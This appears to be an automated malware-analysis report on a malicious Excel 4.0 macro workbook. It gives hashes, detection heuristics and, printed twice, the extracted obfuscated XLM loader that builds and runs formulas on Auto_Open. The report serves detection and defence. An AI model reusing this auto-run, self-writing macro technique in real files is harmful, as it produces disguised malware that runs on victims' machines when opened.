Office (OLE) malware analysis — malicious · 334e7ac400a78bdb

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:39:26 Authoring application: Microsoft Excel First seen: 2021-04-25

MD5: 41085923e4bd0fb1c65d0f5c639d0d14 SHA-1: 4e5738fcc42e271fc899f124354844cead5ede26 SHA-256: 334e7ac400a78bdb5667b8963f2535a111bb32c1928ce6e480ec686884101d61

140 Risk Score

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6446 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	6446 bytes
SHA-256: `669f1f3d2b16830074c792f8b0e1253d67a7acb4fa4b9587d9ee8b8a5927c4ac`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - PgucP ' 0018 23 LABEL : Cell Value, String Constant - AUrzIccy len=0 ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!A169 ' 0018 27 LABEL : Cell Value, String Constant - CRvpyZPzbJSL len=0 ' 0018 24 LABEL : Cell Value, String Constant - fWsAoXrRg len=0 ' 0018 23 LABEL : Cell Value, String Constant - iSrocqvL len=0 ' 0018 24 LABEL : Cell Value, String Constant - IWjwKUSoN len=0 ' 0018 25 LABEL : Cell Value, String Constant - iZDUeHqeQA len=0 ' 0018 20 LABEL : Cell Value, String Constant - jjItE len=0 ' 0018 22 LABEL : Cell Value, String Constant - KHvxjCg len=0 ' 0018 26 LABEL : Cell Value, String Constant - lTuRGGaslAg len=0 ' 0018 23 LABEL : Cell Value, String Constant - LZOYtPmY len=0 ' 0018 27 LABEL : Cell Value, String Constant - MzAksoRxpxwb len=0 ' 0018 25 LABEL : Cell Value, String Constant - pHmUZrYzjv len=0 ' 0018 24 LABEL : Cell Value, String Constant - qHgvmACzy len=0 ' 0018 23 LABEL : Cell Value, String Constant - qiMaMYbN len=0 ' 0018 21 LABEL : Cell Value, String Constant - qVpanj len=0 ' 0018 20 LABEL : Cell Value, String Constant - Rcwes len=0 ' 0018 21 LABEL : Cell Value, String Constant - VdieDx len=0 ' 0018 24 LABEL : Cell Value, String Constant - vqhrIgTMz len=0 ' 0018 27 LABEL : Cell Value, String Constant - WiLRfArXqosW len=0 ' 0018 24 LABEL : Cell Value, String Constant - YuzfNZTTg len=0 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' PgucP,A74,"SET.NAME("qVpanj",VALUE("0"))","" ' PgucP,A78,"SET.NAME("iSrocqvL",qVpanj)","" ' PgucP,A80,"SET.NAME("pHmUZrYzjv",qVpanj)","" ' PgucP,A85,"SET.NAME("qHgvmACzy",COUNTA(vqhrIgTMz))","" ' PgucP,A87,"SET.NAME("LZOYtPmY",COUNTA(YuzfNZTTg))","" ' PgucP,A92,[],"" ' PgucP,A97,"SET.NAME("KHvxjCg","")","" ' PgucP,A101,"iSrocqvL","" ' PgucP,A104,"SET.NAME("lTuRGGaslAg",HLOOKUP("",vqhrIgTMz,iSrocqvL,FALSE))","" ' PgucP,A107,"IWjwKUSoN","" ' PgucP,A109,"SET.NAME("WiLRfArXqosW",qVpanj)","" ' PgucP,A114,[],"" ' PgucP,A116,"WiLRfArXqosW","" ' PgucP,A118,"VdieDx","" ' PgucP,A120,"Rcwes","" ' PgucP,A125,"jjItE","" ' PgucP,A128,"SET.NAME("CRvpyZPzbJSL",VALUE(HLOOKUP("",YuzfNZTTg,jjItE,FALSE)))","" ' PgucP,A133,"AUrzIccy","" ' PgucP,A136,"KHvxjCg","" ' PgucP,A138,"pHmUZrYzjv","" ' PgucP,A142,NEXT(),"" ' PgucP,A145,"iZDUeHqeQA","" ' PgucP,A150,"SET.NAME("f",INT(T(FORMULA(T(KHvxjCg)&"",""&T(iZDUeHqeQA)))))","" ' PgucP,A154,"MzAksoRxpxwb","" ' PgucP,A159,NEXT(),"" ' PgucP,A164,RETURN(),"" ' PgucP,A197,"SET.NAME("fWsAoXrRg",A74)","" ' PgucP,A202,"vqhrIgTMz","" ' PgucP,A207,"SET.NAME("YuzfNZTTg",R76C12)","" ' PgucP,A210,"SET.NAME("MzAksoRxpxwb",216)","" ' PgucP,A212,"SET.NAME("qiMaMYbN",1)","" ' PgucP,A215,fWsAoXrRg(),"" ' PgucP,A216,HALT(),""

SHA-256: 669f1f3d2b16830074c792f8b0e1253d67a7acb4fa4b9587d9ee8b8a5927c4ac

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  PgucP
' 0018     23 LABEL : Cell Value, String Constant - AUrzIccy len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!A169 
' 0018     27 LABEL : Cell Value, String Constant - CRvpyZPzbJSL len=0 
' 0018     24 LABEL : Cell Value, String Constant - fWsAoXrRg len=0 
' 0018     23 LABEL : Cell Value, String Constant - iSrocqvL len=0 
' 0018     24 LABEL : Cell Value, String Constant - IWjwKUSoN len=0 
' 0018     25 LABEL : Cell Value, String Constant - iZDUeHqeQA len=0 
' 0018     20 LABEL : Cell Value, String Constant - jjItE len=0 
' 0018     22 LABEL : Cell Value, String Constant - KHvxjCg len=0 
' 0018     26 LABEL : Cell Value, String Constant - lTuRGGaslAg len=0 
' 0018     23 LABEL : Cell Value, String Constant - LZOYtPmY len=0 
' 0018     27 LABEL : Cell Value, String Constant - MzAksoRxpxwb len=0 
' 0018     25 LABEL : Cell Value, String Constant - pHmUZrYzjv len=0 
' 0018     24 LABEL : Cell Value, String Constant - qHgvmACzy len=0 
' 0018     23 LABEL : Cell Value, String Constant - qiMaMYbN len=0 
' 0018     21 LABEL : Cell Value, String Constant - qVpanj len=0 
' 0018     20 LABEL : Cell Value, String Constant - Rcwes len=0 
' 0018     21 LABEL : Cell Value, String Constant - VdieDx len=0 
' 0018     24 LABEL : Cell Value, String Constant - vqhrIgTMz len=0 
' 0018     27 LABEL : Cell Value, String Constant - WiLRfArXqosW len=0 
' 0018     24 LABEL : Cell Value, String Constant - YuzfNZTTg len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  PgucP,A74,"SET.NAME("qVpanj",VALUE("0"))",""
'  PgucP,A78,"SET.NAME("iSrocqvL",qVpanj)",""
'  PgucP,A80,"SET.NAME("pHmUZrYzjv",qVpanj)",""
'  PgucP,A85,"SET.NAME("qHgvmACzy",COUNTA(vqhrIgTMz))",""
'  PgucP,A87,"SET.NAME("LZOYtPmY",COUNTA(YuzfNZTTg))",""
'  PgucP,A92,[],""
'  PgucP,A97,"SET.NAME("KHvxjCg","")",""
'  PgucP,A101,"iSrocqvL",""
'  PgucP,A104,"SET.NAME("lTuRGGaslAg",HLOOKUP("*",vqhrIgTMz,iSrocqvL,FALSE))",""
'  PgucP,A107,"IWjwKUSoN",""
'  PgucP,A109,"SET.NAME("WiLRfArXqosW",qVpanj)",""
'  PgucP,A114,[],""
'  PgucP,A116,"WiLRfArXqosW",""
'  PgucP,A118,"VdieDx",""
'  PgucP,A120,"Rcwes",""
'  PgucP,A125,"jjItE",""
'  PgucP,A128,"SET.NAME("CRvpyZPzbJSL",VALUE(HLOOKUP("*",YuzfNZTTg,jjItE,FALSE)))",""
'  PgucP,A133,"AUrzIccy",""
'  PgucP,A136,"KHvxjCg",""
'  PgucP,A138,"pHmUZrYzjv",""
'  PgucP,A142,NEXT(),""
'  PgucP,A145,"iZDUeHqeQA",""
'  PgucP,A150,"SET.NAME("f",INT(T(FORMULA(T(KHvxjCg)&"",""&T(iZDUeHqeQA)))))",""
'  PgucP,A154,"MzAksoRxpxwb",""
'  PgucP,A159,NEXT(),""
'  PgucP,A164,RETURN(),""
'  PgucP,A197,"SET.NAME("fWsAoXrRg",A74)",""
'  PgucP,A202,"vqhrIgTMz",""
'  PgucP,A207,"SET.NAME("YuzfNZTTg",R76C12)",""
'  PgucP,A210,"SET.NAME("MzAksoRxpxwb",216)",""
'  PgucP,A212,"SET.NAME("qiMaMYbN",1)",""
'  PgucP,A215,fWsAoXrRg(),""
'  PgucP,A216,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.